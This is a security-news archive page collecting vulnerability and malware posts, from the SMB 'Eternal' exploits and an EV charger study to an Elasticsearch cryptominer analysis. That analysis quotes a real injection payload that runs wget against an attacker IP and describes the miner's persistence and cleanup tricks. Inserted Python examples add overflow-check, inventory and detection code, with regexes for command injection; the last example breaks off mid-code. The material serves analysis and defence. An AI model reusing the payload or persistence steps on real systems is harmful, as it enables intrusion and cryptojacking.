Category Archives: Vulnerabilities

Adobe December Patch Tuesday Fixed 38 Critical Vulnerabilities In Adobe Reader And Acrobat DC

Adobe has patched a number of security vulnerabilities on the last scheduled monthly update of this year. All these patches

Adobe December Patch Tuesday Fixed 38 Critical Vulnerabilities In Adobe Reader And Acrobat DC on Latest Hacking News.

Hide ‘N Seek Botnet Continues to Grow by Infecting IoT Devices Using Default Credentials

Avast security analysts reported that the Hide ‘N Seek botnet continues to grow by infecting vulnerable Internet of Things (IoT) devices still using their default passwords.

According to Avast, the Hide ‘N Seek botnet comes with two main functionalities. The first capability involves the use of a scanner borrowed from Mirai malware to reach random IP addresses of IoT devices and abuse well-known exploits. If this doesn’t work, the scanner attempts to brute-force access to an IoT device using a hard-coded list of default passwords.

For its second functionality, the IoT botnet uses a peer-to-peer (P2P) protocol to share information about new peers, exfiltrate files from an infected device and distribute new binaries, including some for a Monero cryptocurrency miner. Avast’s researchers believe the Monero miner was just a test and that the attackers’ true intentions are still unknown.

A Busy Year for Hide ‘N Seek

Bitdefender researchers were the first to spot the Hide ‘N Seek botnet in January 2018. A few months later, Bitdefender reported the threat had added code that abused two new vulnerabilities affecting Internet Protocol television (IPTV) camera models to scan for a larger pool of vulnerable devices and to achieve persistence on an infected IoT product.

More improvements followed in July, when 360 Netlab observed additional exploits and a then-inactive mining program. Two months later, Bitdefender discovered yet another update when Hide ‘N Seek gained the ability to exploit the Android Debug Bridge (ADB) over Wi-Fi feature in Android devices.

The botnet’s evolution is of particular concern given the overall growth in IoT threats. In just the first half of 2018, Kaspersky Lab detected 121,588 IoT malware samples — three times as many samples uncovered for all of 2017.

How to Defend Your Organization Against IoT Botnets

Security professionals can help defend against IoT botnets by changing all default passwords on their organization’s devices. Security teams should also build an incident response team that can oversee software patches and disclose any breaches.

Sources: Avast, Bitdefender, Bitdefender (1), 360 Netlab, Bitdefender(2), Kaspersky Lab

The post Hide ‘N Seek Botnet Continues to Grow by Infecting IoT Devices Using Default Credentials appeared first on Security Intelligence.

This Week in Security News: Security Predictions and Malware Attacks

Welcome to our weekly roundup, where we share what you need to know about the cybersecurity news and events that happened over the past few days. This week, learn about the span of categories in Trend Micro’s 2019 Security Predictions. Also, learn about a new exploit kit that targets home and small office routers and attacks a victim’s mobile device or desktop through the web applications they are authenticated to.

Read on:

2019 Security Predictions Report Released

Good security predictions are very difficult to develop, and companies and consumers need to be selective about the security advice they take.

U.S. Investigators Point to China in Marriott Hack Affecting 500 Million Guests

U.S. government investigators increasingly believe that Chinese state hackers were responsible for the Marriott breach that exposed the private information and travel details of as many as 500 million people.

What Happens When Victims Pay Ransomware Attackers?

Although ransomware infections have been around for years now, they continue to spur success – and high monetary profits – for attackers.

House Releases Cybersecurity Strategy Report

The House Energy and Commerce Committee released the comprehensive Cybersecurity Strategy Report, in which it identified procedures to both address and prevent cybersecurity incidents.

The 9 Best Ways to Protect Your New Tech Gifts

The time for all things merry and bright is here and there is nothing brighter than a shiny new smartphone or laptop! Exciting as it is to play with all their new features as soon as they come out of the box, new devices also bring new risks.

New Exploit Kit “Novidade” Found Targeting Home and SOHO Routers

Trend Micro identified a new exploit kit that targets home or small office routers and enables attacks on a victim’s mobile device or desktop through the web applications they are authenticated to.

Cybersecurity, Trade Tensions Rank as Top Threats to Markets in 2019, Survey Finds

The biggest risk to markets going into the new year is the threat of a cybersecurity attack, according to a new survey of risk managers and non-risk professionals by the Depository Trust and Clearing Corp.

Cryptocurrency Miner Spreads via Old Vulnerabilities on Elasticsearch

To prevent attacks that exploit known vulnerabilities in Elasticsearch, it is necessary to patch systems regularly and have security monitoring in place with custom rules.

Security Threats and Risks in Smart Factories

A single cyberattack can negate the benefits derived from a smart factory. That’s why security must not be left behind as organizations move forward with their “smart” agendas. 

Will Sophisticated Attacks Dominate in 2019?

Trend Micro released its 2019 predictions report, warning that attackers will increase the effectiveness of proven attack methods by adding more sophisticated elements to take advantage of the changing technology landscape. 

New Version of Disk-Wiping Shamoon/Disttrack Spotted: What You Need to Know

Trend Micro came across external reports that the notorious, disk-wiping worm Shamoon, also known as Disttrack, has reemerged with an updated version. 

What are some of your 2019 Security Predictions? Share your thoughts in the comments below or follow me on Twitter to continue the conversation: @JonLClay.

The post This Week in Security News: Security Predictions and Malware Attacks appeared first on .

How threat actors are using SMB vulnerabilities

Some of the most devastating ransomware and Trojan malware variants depend on vulnerabilities in the Windows Server Message Block (SMB) to propagate through an organization’s network. Windows SMB is a protocol used by PCs for file and printer sharing, as well as for access to remote services.

Microsoft released a patch for the SMB vulnerabilities in March 2017, but many organizations and home users have still not applied it. Those unpatched systems let in threats that take advantage of these vulnerabilities, helping active malware campaigns spread like Californian wildfire.

SMB vulnerabilities have been so successful for threat actors that they’ve been used in some of the most visible ransomware outbreaks and sophisticated Trojan attacks of the last two years. In fact, our product telemetry has recorded 5,315 detections of Emotet and 6,222 of TrickBot in business networks—two Trojan variants that are using the SMB vulnerabilities—in the last 30 days alone.

What makes them so effective?

What makes some malware so widespread is the way in which it propagates. While a massive spam campaign yields only a few victims that actually pay off, a worm-like infection that keeps spreading itself multiplies returns with little effort. And that’s exactly what the SMB vulnerabilities allow their payloads to do: spread laterally through connected systems.

For example, WannaCry ransomware (also known as WannaCrypt), which used one of the SMB vulnerabilities, was launched in May 2017, yet the infection continues to expand. Below is the graph that shows our telemetry for Ransom.WannaCrypt for the month of November 2018.

It’s been more than 1.5 years, and WannaCry continues to proliferate, thanks to the sheer number of unpatched machines connected to infected networks.

How did this come about?

At the moment, there are three exploits in the wild that use SMB vulnerabilities. These exploits have been dubbed EternalBlue (used by WannaCry and Emotet), EternalRomance (NotPetya, Bad Rabbit, and TrickBot), and EternalChampion. There is a fourth exploit called EternalSynergy, but we have only seen a Proof of Concept (PoC)—nothing has appeared yet in the wild.

All these exploits were leaked by the ShadowBrokers Group, who allegedly stole them from the NSA. Less than a month after ShadowBrokers published their “findings,” the first fully functional malware that used the EternalBlue exploit, WannaCry, was found in the wild.

Since then, multiple large-scale malware attacks have relied on the SMB vulnerabilities to penetrate organizations’ networks, including the NotPetya and Bad Rabbit ransomware campaigns in 2017, and now the Emotet and TrickBot Trojan attacks, which have been ongoing through the third and fourth quarter of 2018.

Let’s now take a closer, more technical look at each exploit and how they work.

EternalBlue

A bug in the process of converting File Extended Attributes (FEA) from OS2 structure to NT structure by the Windows SMB implementation can lead to a buffer overflow in the non-paged kernel pool. This non-paged pool consists of virtual memory addresses that are guaranteed to reside in physical memory for as long as the corresponding kernel objects are allocated.

A buffer overflow is a programming flaw that lets the data written to a reserved memory area (the buffer) go outside of bounds (overflow), allowing it to write data to adjacent memory locations. This means attackers are able to control the content of certain memory locations that they should not be able to access, which attackers then exploit to their advantage. In the case of EternalBlue, they are able to control the content of a heap that has execution permission, which leads to the Remote Code Execution (RCE) vulnerability, or the ability to execute commands on a target machine over the network.

EternalRomance

EternalRomance is an RCE attack that exploits CVE-2017-0145 against the legacy SMBv1 file-sharing protocol. Note that file sharing over SMB is normally used only on local networks, and the SMB ports are typically blocked from the Internet by a firewall. However, if an attacker has access to a vulnerable endpoint running SMB, the ability to run arbitrary code in kernel context from a remote location is a serious compromise.

At the core of this exploit is a type confusion vulnerability. Type confusion vulnerabilities are programming flaws that happen when a piece of code doesn’t verify the type of object that is passed to it before using it. Type confusion can allow an attacker to feed function pointers or data into the wrong piece of code. In some cases, this can lead to code execution.

In other cases, a type confusion vulnerability leads to an arbitrary heap write, or heap spray. Heap spraying is a method typically used in exploits that places large amounts of code in a memory location that the attacker expects to be read. Usually, these bits of code point to the start of the actual code that the exploit wants to run in order to compromise the system that is under attack.

After the spray has finished, the exploit uses an info leak in a TRANS_PEEK_NMPIPE transaction. It uses the info leak to determine whether the target is running a 32- or 64-bit version of Windows and to get kernel pointers for various SMB objects.

EternalChampion

The issue exploited by EternalChampion is a race condition in how SMBv1 handles transactions. A race condition, or race hazard, is the behavior of a system where the output depends on the sequence or timing of other uncontrollable events. It becomes a bug when events do not happen in the order the programmer intended. Sometimes these bugs can be exploited when the outcome is predictable and works to the attackers’ advantage.

Meanwhile, a transaction is a type of request that can potentially span multiple packets. For example, if a request is too large to fit in a single server message block (SMB), a transaction of the appropriate size can be created, and this will store the data as it is received from multiple SMBs.

This vulnerability is exploited in two ways: first for an information leak, and second for remote code execution. The bug is first exploited to leak pool information via an out-of-bounds read. To do this, a single packet containing multiple SMBs is sent to the server. This packet contains three relevant pieces:

  • A primary transaction request that will immediately be executed.
  • A secondary transaction request that triggers the bug caused by the race condition.
  • Sets of primary transactions that heap spray the pool with the intention to place a transaction structure immediately behind the one that tracks the first primary transaction request.

First, a transaction is created that contains the shellcode. This does not start the exploit; it just holds the second-stage payload. Next, a packet is sent that contains multiple SMBs. The packet contains all expected transaction data and immediately begins execution.

The secondary transaction handler copies the secondary transaction request’s data if it fits in the buffer. But due to the race condition, the pointer now points to the stack of the primary transaction request handler’s thread (as opposed to the expected pool buffer). This allows an attacker to write their data directly to the stack of another thread.

The attacker has control over the displacement, so they can choose the amount of data to copy and then copy it. This allows them to precisely overwrite a return address stored on the stack of the primary transaction request handler’s thread, which results in remote code execution.

EternalSynergy

The Proof of Concept for EternalSynergy shows that incoming SMB messages are copied by an initial handler into the corresponding transaction buffer. The handler assumes that the provided address is the beginning of the buffer. During a write transaction, however, the same address is assumed to be the end of the existing data, and the address pointing to the beginning of the buffer is updated accordingly.

This means that an attacker can construct a secondary message in the transaction to point beyond the start of the buffer, resulting in a buffer overflow during the copy action.
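The EternalChampion and EternalSynergy descriptions above share one pattern: a secondary message of a multi-packet transaction carries its own displacement into the transaction buffer, and the handler copies data there without checking it against the size the transaction was created with. The following Python model is an added example, not code from the post, from Microsoft or from any exploit; it does not parse SMB, and the Pool, Transaction and SecondaryMessage names are invented for the illustration. It puts a second allocation right behind a transaction buffer and delivers one in-bounds and one out-of-bounds secondary message through an unchecked and a checked copy routine, so the difference shows up in what the neighbouring allocation contains afterwards.

```python
"""Toy model of multi-packet transaction reassembly with and without bounds
checks. Constructed illustration only: it does not parse real SMB packets, and
the names Pool, Transaction and SecondaryMessage are invented for the example."""
from __future__ import annotations

from dataclasses import dataclass


class PoolOverflow(Exception):
    """Raised by the checked handler when a write would leave the buffer."""


@dataclass
class SecondaryMessage:
    """One follow-up packet of a transaction: where its bytes go (displacement
    relative to the start of the transaction buffer) and the bytes themselves."""
    displacement: int
    data: bytes


class Pool:
    """Flat simulated allocator: adjacent allocations sit back to back, so a
    write past the end of one region lands in the next one."""

    def __init__(self, size: int) -> None:
        self.memory = bytearray(size)
        self.next_free = 0

    def alloc(self, size: int) -> tuple[int, int]:
        start = self.next_free
        self.next_free += size
        return start, self.next_free

    def read(self, start: int, end: int) -> bytes:
        return bytes(self.memory[start:end])


class Transaction:
    """A request too large for one packet: the server allocates a buffer for
    the announced total size and fills it as secondary messages arrive."""

    def __init__(self, pool: Pool, total_size: int) -> None:
        self.pool = pool
        self.start, self.end = pool.alloc(total_size)
        self.total_size = total_size

    def copy_unchecked(self, msg: SecondaryMessage) -> None:
        # Vulnerable pattern: the displacement from the packet is trusted, so
        # a displacement near or beyond the buffer end writes into whatever
        # the allocator placed next to this transaction.
        dest = self.start + msg.displacement
        self.pool.memory[dest:dest + len(msg.data)] = msg.data

    def copy_checked(self, msg: SecondaryMessage) -> None:
        # Hardened pattern: every write is validated against the size the
        # transaction was created with, before any byte is copied.
        if msg.displacement < 0 or msg.displacement + len(msg.data) > self.total_size:
            raise PoolOverflow(
                f"displacement {msg.displacement} + {len(msg.data)} bytes exceeds "
                f"transaction buffer of {self.total_size} bytes")
        dest = self.start + msg.displacement
        self.pool.memory[dest:dest + len(msg.data)] = msg.data


def demo(checked: bool) -> dict:
    """Create a transaction next to another allocation, then deliver one
    in-bounds message and one whose displacement runs past the buffer.
    Returns how many messages were rejected and what the neighbouring
    allocation contains afterwards."""
    pool = Pool(64)
    trans = Transaction(pool, total_size=16)
    neighbour_start, neighbour_end = pool.alloc(16)  # sits right after trans
    pool.memory[neighbour_start:neighbour_end] = b"N" * 16
    copy = trans.copy_checked if checked else trans.copy_unchecked
    messages = [SecondaryMessage(0, b"A" * 8),   # fits: 0 + 8 <= 16
                SecondaryMessage(12, b"B" * 8)]  # 12 + 8 > 16: out of bounds
    rejected = 0
    for msg in messages:
        try:
            copy(msg)
        except PoolOverflow:
            rejected += 1
    neighbour = pool.read(neighbour_start, neighbour_end)
    return {
        "rejected": rejected,
        "neighbour_corrupted": neighbour != b"N" * 16,
        "neighbour": neighbour,
    }


if __name__ == "__main__":
    print("unchecked:", demo(checked=False))
    print("checked:  ", demo(checked=True))
```

Running the block prints both outcomes: the unchecked copy leaves the first four bytes of the neighbouring allocation overwritten, the checked copy rejects the second message and leaves the neighbour intact. The check in copy_checked is the whole fix: validate displacement and length against the announced total before copying, and reject rather than silently clamp, so the malformed request surfaces in error handling and logs.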

EternalRocks

Looking for information about these SMB exploits, you may also run into an exploit called EternalRocks. EternalRocks was not included in the ShadowBrokers release, but was instead constructed and discovered later. EternalRocks uses seven NSA tools where, for example, WannaCry only used two (EternalBlue and another called DoublePulsar).

Prevention and remediation

Despite the significant power SMB vulnerabilities afford to attackers, there is one simple remedy to prevent them from ever becoming problematic.

Patch your systems.

The Windows operating systems vulnerable to the attacks found in the wild all predate Windows 10. Most attacks work only on Windows 7 and earlier, and Microsoft released patches for the leaked vulnerabilities under Microsoft Security Bulletin MS17-010. This leaves little to no reason for networks to be vulnerable to these attacks, yet the number of current victims is overwhelming.

By applying the patch released by Microsoft in 2017, all your eternal headaches can magically disappear. And for extra measure, we also recommend you patch and update all systems, browsers, and software as soon as possible to shore up any other potential vulnerabilities in the network.

In addition, many cybersecurity solutions, including Malwarebytes Endpoint Protection, offer innovative anti-exploit technology that can block threats such as EternalBlue from ever dropping their payloads and infecting systems.

For example, Malwarebytes’ anti-exploit module detected WannaCry as Ransom.WannaCrypt right from the start. Below, we created a heat map using our telemetry, showing where the infection started and how fast it spread across the globe.

It is for good reason that most cybersecurity guides advise users to patch quickly and keep systems updated. So many of the infections seen today could be avoided with consistent monitoring and basic computer maintenance. Unfortunately, a lot of businesses believe they do not have the time or manpower to follow this advice. But when companies leave their networks unprotected, they compromise the integrity of all of our online experiences—especially when SMB vulnerabilities allow infections to spread so quickly.

Don’t be one of those companies. Get protected and stay updated!

The post How threat actors are using SMB vulnerabilities appeared first on Malwarebytes Labs.

Microsoft December Patch Tuesday Addresses Nine Critical Vulnerabilities Including A Zero-Day

This week, Microsoft has rolled out the last scheduled updates for this year. Nonetheless, it again has released a fix

Microsoft December Patch Tuesday Addresses Nine Critical Vulnerabilities Including A Zero-Day on Latest Hacking News.

Google+ Shut Down Date Dragged Earlier Due to Another Massive Breach

A couple of months ago, Google announced they will sunset their product Google Plus. The reasons behind this harsh decision

Google+ Shut Down Date Dragged Earlier Due to Another Massive Breach on Latest Hacking News.

Securelist: Remotely controlled EV home chargers – the threats and vulnerabilities

We are now seeing signs of a possible shift in the field of personal transport. Recent events such as the ‘dieselgate’ scandal undermine customer and government confidence in combustion engines and their environmental safety. At the same time there has been a big step forward in the development of electric vehicles. In addition to favorable media coverage, modern EVs have evolved a lot in terms of battery endurance, driving speeds and interior and exterior design.

To stimulate growth in the personal EV segment some countries even have special tax relief programs for EV owners. But there is still a major problem – the lack of charging infrastructure. This may not be as relevant in big cities, but in other places car owners mostly rely on their own home EV chargers, a relatively new class of device that has attracted our attention.

There are lots of home charger vendors. Some of them, such as ABB or GE, are well-known brands, but some smaller companies have to add ‘bells and whistles’ to their products to attract customers. One of the most obvious and popular options in this respect is remote control of the charging process. But from our point of view this sort of improvement can make chargers an easy target for a variety of attacks. To prove it we decided to take one of them, ChargePoint Home made by ChargePoint, Inc., and conduct some in-depth security research.

ChargePoint Home supports both Wi-Fi and Bluetooth wireless technologies. The end user can remotely control the charging process with a mobile application available for both iOS and Android platforms. All that’s needed is to register a new account in the application, connect a smartphone to the device via Bluetooth, set the parameters of a Wi-Fi network for an internet connection, and finish the registration process by sending the created user ID and the smartphone’s GPS coordinates to the backend from the device.

In a registered state, the device establishes a connection to the remote backend server, which is used to transfer the user’s commands from the application. The application thereby makes it possible to remotely change the maximum consumable current and to start and stop the charging process.

To explore the registration data flows in more detail, we used a rooted smartphone with the hcidump application installed. With this application, we were able to make a dump of the whole registration process, which can later be viewed in Wireshark.

The Bluetooth interface is only used during the registration phase and disabled afterwards. But we found another, rather unusual wireless communication channel that is implemented by means of photodiode on the device side and photoflash on the smartphone side. It seems to have just one purpose: by playing a special blinking pattern on the flash, the application can trigger the factory reset process after the device’s next reboot. During the reboot, Wi-Fi settings and registered user information will be wiped.

In addition, we found a web server with enabled CGI on the device. All web server communications are protected by the SSL protocol with the same scheme as the control server, so the web server inherits the described certificate security issue. We discovered a series of vulnerabilities in CGI binaries that can be used by an intruder to gain control of the device. Two of them were found in the binary used to upload files in different folders to the device depending on the query string parameters. Other vulnerabilities (stack buffer overflow) were found in the binary used to send different commands to the charger in the vendor-specific format (included in a POST message body). We also found the same stack buffer overflow vulnerabilities in the other binary used for downloading different system logs from the device. All this presents attackers with an opportunity to control the charging process by connecting to the target’s Wi-Fi network.

Vulnerabilities in the Bluetooth stack were also found, but they are all minor due to the limited use of Bluetooth during regular device operation.

We can see two major capabilities an intruder can gain from a successful attack. They will be able to:

  • Adjust the maximum current that can be consumed during charging. As a result, an attacker can temporarily disable parts of the user’s home electrical system or even cause physical damage – for example, if the device is not connected properly, a fire could start due to wires overheating.
  • Stop a car’s charging process at any time, for example, restricting an EV owner’s ability to drive where they need to, and even cause financial losses.

We sent all our findings to ChargePoint, Inc. The vulnerabilities we discovered have already been patched, but the question remains as to whether there is any reason to implement wireless interfaces when there is no real need for them. The benefits they bring are often outweighed by the security risks they add.

Download “ChargePoint Home security research” (English, PDF)

SecurityWeek RSS Feed: Rhode Island Sues Alphabet Over Google+ Security Incidents

A government organization in Rhode Island announced on Wednesday that it has filed a lawsuit against Google’s parent company, Alphabet Inc., over the recent security incidents involving the Google+ social network.

PrivilegeEsc-Linux – Open Source Script for Enumeration on Linux

PrivilegeEsc-Linux is a simple script which checks the security on a Linux machine. It can run many different options, such

PrivilegeEsc-Linux – Open Source Script for Enumeration on Linux on Latest Hacking News.

Think Your Network Is Safe? If You Don’t Have Visibility Into Hardware Vulnerabilities, Think Again

If you follow basic security best practices and quickly patch software issues as they arise, you may think your network is safe from cyberthreats. But think again.

Although the number of reported software vulnerabilities is growing year to year, it’s hardware vulnerabilities that can be even more difficult to fix and can cause extensive damage to enterprise networks. With attack surfaces growing and cybercriminal tactics becoming more dangerous and sophisticated by the minute, security teams can’t afford to neglect hardware flaws.

Security operations center (SOC) analysts need full visibility into Common Vulnerabilities and Exposures (CVE) and other sources of vulnerability data to effectively identify, manage and remediate hardware vulnerabilities. Let’s explore some steps you can take to achieve this visibility and plug security gaps before threat actors can exploit them to breach your network.

Assess Your Inventory to Gain Visibility Into Hardware Vulnerabilities

The first step is to understand your infrastructure. Collect key data on your hardware and software, such as central processing unit (CPU) vendor and model, firmware and basic input/output system (BIOS) version, motherboard vendor and model, and a list of connected devices. These attributes will help you understand the potential impact from a highly visible attack like Meltdown or Spectre and build a response plan accordingly.

If hardware is impacted, it may be very difficult to fix the problem. Often the only viable mitigation strategy is to apply a software patch. Hardware issues frequently occur at the chip level and sometimes require collaboration between hardware and software vendors. Therefore, you need a consolidated view into your hardware and software inventory to assess the exposure level of any hardware vulnerability and know which machines already have a software patch applied.

Identify Reliable Sources of Vulnerability Data

Once you know what hardware and software you have deployed, the next step is to correlate the inventory data with reliable sources of vulnerability data. Data normalization is a known challenge during this phase, and you may choose to either build your own solution or invest in a ready-made application programming interface (API) enriched with vulnerability information. But even with automation, manual work is often required to further enrich this vulnerability data with hardware attributes, assess the impact and prioritize the response accordingly.
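As an added illustration of the correlation step described above (not code from the post or from any product), the Python below normalises inventory records and matches them against a small vulnerability feed. Everything in it is constructed: the host records, the vulnerability entries with placeholder identifiers, the firmware versions and the patch names. It yields the two facts the text says a consolidated view must provide: which machines are affected at all, and which of those are already covered by a firmware fix or a software patch.

```python
"""Correlating a hardware/software inventory with vulnerability data.
Added example, not from the post: inventory fields, vulnerability records,
versions and identifiers are all constructed placeholders."""
from __future__ import annotations

import re

# Constructed inventory: what an asset collector might export, including the
# inconsistent vendor casing and model strings that make normalisation needed.
INVENTORY = [
    {"host": "ws-01", "cpu_vendor": "Intel",
     "cpu_model": "Intel(R) Core(TM) i7-8650U CPU @ 1.90GHz",
     "bios_version": "v1.4.2", "patches": ["PATCH-PLACEHOLDER-1"]},
    {"host": "ws-02", "cpu_vendor": "intel", "cpu_model": "Core i7-8650U",
     "bios_version": "1.6.0", "patches": []},
    {"host": "srv-01", "cpu_vendor": "AMD", "cpu_model": "EPYC 7351P",
     "bios_version": "2.0.1", "patches": []},
]

# Constructed vulnerability feed: placeholder ids, the affected models in
# normalised form, the firmware version that fixes the issue and the OS
# patches that mitigate it when firmware cannot be updated.
VULNERABILITIES = [
    {"id": "VULN-PLACEHOLDER-1", "cpu_vendor": "intel",
     "cpu_models": ["core i7-8650u"], "fixed_bios": "1.5.0",
     "mitigating_patches": ["PATCH-PLACEHOLDER-1"]},
    {"id": "VULN-PLACEHOLDER-2", "cpu_vendor": "amd",
     "cpu_models": ["epyc 7351p"], "fixed_bios": "2.1.0",
     "mitigating_patches": []},
]

# Trademark marks, the word CPU and the clock-speed suffix carry no identity.
_NOISE = re.compile(r"\((?:r|tm)\)|\bcpu\b|@.*$", re.IGNORECASE)


def normalize_model(text: str) -> str:
    """'Intel(R) Core(TM) i7-8650U CPU @ 1.90GHz' -> 'core i7-8650u'."""
    text = _NOISE.sub(" ", text).lower().strip()
    text = re.sub(r"^(intel|amd)\s+", "", text)  # vendor is its own field
    return " ".join(text.split())


def version_tuple(version: str) -> tuple[int, ...]:
    """'v1.4.2' -> (1, 4, 2); non-numeric parts are ignored."""
    return tuple(int(part) for part in re.findall(r"\d+", version))


def assess(inventory=INVENTORY, vulnerabilities=VULNERABILITIES) -> list[dict]:
    """Return one finding per (host, vulnerability) pair whose CPU is affected,
    with the exposure state derived from firmware version and installed patches."""
    findings = []
    for asset in inventory:
        vendor = asset["cpu_vendor"].strip().lower()
        model = normalize_model(asset["cpu_model"])
        bios = version_tuple(asset["bios_version"])
        patches = set(asset["patches"])
        for vuln in vulnerabilities:
            if vendor != vuln["cpu_vendor"] or model not in vuln["cpu_models"]:
                continue
            if bios >= version_tuple(vuln["fixed_bios"]):
                state = "fixed-in-firmware"
            elif patches & set(vuln["mitigating_patches"]):
                state = "mitigated-by-software-patch"
            else:
                state = "exposed"
            findings.append({"host": asset["host"], "id": vuln["id"], "state": state})
    return findings


def exposed_hosts(findings: list[dict] | None = None) -> list[str]:
    """Hosts that still need action: neither firmware fix nor software mitigation."""
    findings = assess() if findings is None else findings
    return sorted({f["host"] for f in findings if f["state"] == "exposed"})


if __name__ == "__main__":
    for finding in assess():
        print(finding)
    print("needs action:", exposed_hosts())
```

The normalisation is deliberately narrow (trademark marks, the CPU suffix, vendor prefix); a real feed will need more rules, and the point of keeping it in one function is that every new inventory source only has to be made to pass through the same one.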

Fulfill Your SOC Team’s Need for Speed

To mount a worthy fight against the growing number of cyberthreats amid a growing industrywide skills gap, SOC teams need a solution that addresses their need for speed. If you’re ready to step up to the challenge of hardware vulnerability management, it’s time to shift from a reactive to a proactive approach to endpoint security. Improved visibility into your hardware vulnerabilities is the key to taking that next step.

Make Security Analytics More Effective with Deep Insight into Endpoints

The post Think Your Network Is Safe? If You Don’t Have Visibility Into Hardware Vulnerabilities, Think Again appeared first on Security Intelligence.

Encrypted Messaging Apps Vulnerable To Side-Channel Attacks Including WhatsApp, Telegram, and Signal!

WhatsApp, Signal, and Telegram have all been around for a while. Though a lot of instant messaging apps were already

Encrypted Messaging Apps Vulnerable To Side-Channel Attacks Including WhatsApp, Telegram, and Signal! on Latest Hacking News.

TrendLabs Security Intelligence Blog: Cryptocurrency Miner Spreads via Old Vulnerabilities on Elasticsearch

by Jindrich Karasek and Loseway Lu

We detected mining activity on our honeypot involving the search engine Elasticsearch, a Java-based search engine built on the Lucene library and released as open source. The attack was deployed by taking advantage of two known vulnerabilities: CVE-2015-1427, a vulnerability in its Groovy scripting engine that allows remote attackers to execute arbitrary shell commands through a crafted script, and CVE-2014-3120, a vulnerability in the default configuration of Elasticsearch. The vulnerable versions are no longer supported by Elasticsearch.

We found a search query with the following command (also described in a blog by ISC) on a server running Elasticsearch:

{"lupin":{"script": "java.lang.Math.class.forName(\"java.lang.Runtime\").getRuntime().exec(\"wget hxxp://69[.]30[.]203[.]170/gLmwDU86r9pM3rXf/update.sh -P /tmp/sssooo\").getText()"}}}

The command was run by the same system/attacking host, which also hosted the payload. At the time of writing, the IP resolved to the domain name matrixhazel[.]com, which was inaccessible. The system was also found to be running CentOS 6 with both web and SSH servers.

Figure 1. GreyNoise marked the host as a known scanner

It is important to note that this kind of attack is not new, but it has recently reemerged. For instance, Trend Micro Smart Protection Network feedback in November detected the cryptocurrency miner on endpoints in several countries such as China, Taiwan, and the United States.

The miner distributes the bash script update.sh by first invoking the shell and running the download command with output set in the “/tmp/sssooo” file. “/tmp” is used because it has less restrictive permissions on most systems by default.

This attack is relatively simple, yet it can have a significant impact on the victim. Once the attacker gains the ability to run arbitrary commands on the system, they can attempt to escalate privileges or even pivot to other systems in order to compromise the network further.

It should also be noted that while the scheme of the attack is the same in most cases, the payloads might differ. In this case that we analyzed, the payload was the file update.sh. Once run, the bash script update.sh downloads two files called devtools and config.json. The script then deploys the cryptocurrency miner (detected by Trend Micro as Coinminer.Linux.MALXMR.UWEIS).

The actual file with the miner’s ELF64 binary is named devtools, which helps disguise the miner, as “devtools” is also a regular tool on GitHub. The miner uses a configuration as stated in the file config.json.

Figure 2. Details of the configuration file config.json

Such a scheme is already widely used, but the wrapper bash script has several other interesting functions. The coding style is very similar to hacking tools, and parts of the code were also spotted in an Xbash-related case before.

How the cryptocurrency miner is deployed

The miner consists of three files, downloaded through either wget, curl, or url commands in bash:

Figure 3. wget, curl, and url commands

The miner is capable of downloading the following:

  • Devtools – The actual miner;
  • Update.sh – The bash script used to download all the parts (The script is also run during the attack.);
  • Config.json – The configuration file for the miner.

First, it attempts to save the files into the “/etc/” directory and falls back to “/tmp” if that fails; in our case the fallback succeeded. After that, it checks for other ongoing mining activity on the machine: it assumes the device has already been attacked and hijacks the machine from its previous attacker. This process may also be used to update the running miner to a newer version.

Figure 4. Sample of commands that allow the miner to eliminate other existing miners

If it detects other miners in the system, the running processes related to the miners will be killed. It also resets the crontab so cron won’t start other miners again.

Figure 5. Processes of other miners found in the system will be killed

The miner adds itself to the crontab so it’s run every 10 minutes. At the beginning of each run, it unlocks itself with “chattr -i” and updates its files, while at the end of each run it protects the files with “chattr +i”, which prevents modification or removal of the files by other low-privilege users. It also covers its tracks by emptying the history logs (as seen in Figure 8). One interesting point is that when the script is running in the root directory, it tries to add its own SSH key to authorized_keys, which would allow login without a password. The command order looks buggy, however, causing authorized_keys to be removed right after the key is added.

Figure 6. Other miner capabilities: components protection, persistence via crontab, and network traffic encryption

Figure 7. Miner modifies the iptables/firewall in the system

Figure 8. Miner cleans its track by removing the history and emptying files

Conclusion and Recommendations

To prevent attacks that exploit known vulnerabilities in Elasticsearch, it is necessary to patch systems regularly and have security monitoring in place with custom rules, which allows for the detection of basic events as well as complex alerts.

There are variations to the command injected in Elasticsearch as spotted in the wild, but they have these factors in common:

  • They all invoke shell to run a command;
  • They all contain a command to download a file from remote/local locations, like curl, wget, url, ftp/get, and so on;
  • They download the file into either “/etc” or “/tmp”;
  • They are usually tried in sequence, as the attacking host cycles through all combinations of download commands and file locations on the local system until one succeeds in fetching the malicious file.

Detection of related attacks is crucial and should be done through these measures:

  • Log Elasticsearch usage and monitor for strings that may suggest command injection.
  • Monitor the system’s behavior. Shell should only be used by authorized users and solutions.
  • Classify network traffic through correlation. In our case, the malicious IP was contacted regularly, every 10 minutes, which should be easy to spot with the right network monitoring and traffic analysis in place.
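To make the logging recommendation concrete, here is an added example (not code from the post) that scores Elasticsearch request bodies for the injection chain described above and reports those above a threshold. The request log, the 198.51.100.7 source and the ATTACKER_HOST name are constructed placeholders, and the scoring weights are my own choice.

```python
"""Detection logic for the Elasticsearch command-injection pattern described in
the post: a script field that reaches java.lang.Runtime, a download command,
and a drop location under /tmp or /etc. Added example, not the post's code;
the request log below is constructed and uses a placeholder host."""
import json
import re
from dataclasses import dataclass, field

# Indicators drawn from the post's description of the injected queries.
EXEC_PATTERNS = [
    re.compile(r"java\.lang\.Runtime"),
    re.compile(r"getRuntime\s*\(\s*\)"),
    re.compile(r"\.exec\s*\("),
    re.compile(r"class\.forName"),
    re.compile(r"ProcessBuilder"),
]
DOWNLOAD_CMDS = re.compile(r"\b(wget|curl|url|tftp|ftp|get)\b", re.I)
DROP_PATHS = re.compile(r"(?<![\w/])/(?:tmp|etc)(?:/[\w.\-]*)?")
SCRIPT_KEYS = {"script", "inline", "source", "script_fields"}

# Constructed sample: "<timestamp> <src_ip> <method> <path> <json body>" per line.
SAMPLE_LOG = [
    '2018-12-10T10:01:02Z 10.0.0.5 POST /_search '
    '{"query":{"match":{"title":"wget manual"}}}',
    '2018-12-10T10:01:09Z 198.51.100.7 POST /_search '
    '{"lupin":{"script":"java.lang.Math.class.forName(\\"java.lang.Runtime\\")'
    '.getRuntime().exec(\\"wget hxxp://ATTACKER_HOST/update.sh -P /tmp/sssooo\\")'
    '.getText()"}}',
    # Variant with curl into /etc and an unbalanced brace, as seen in captures.
    '2018-12-10T10:11:09Z 198.51.100.7 POST /_search '
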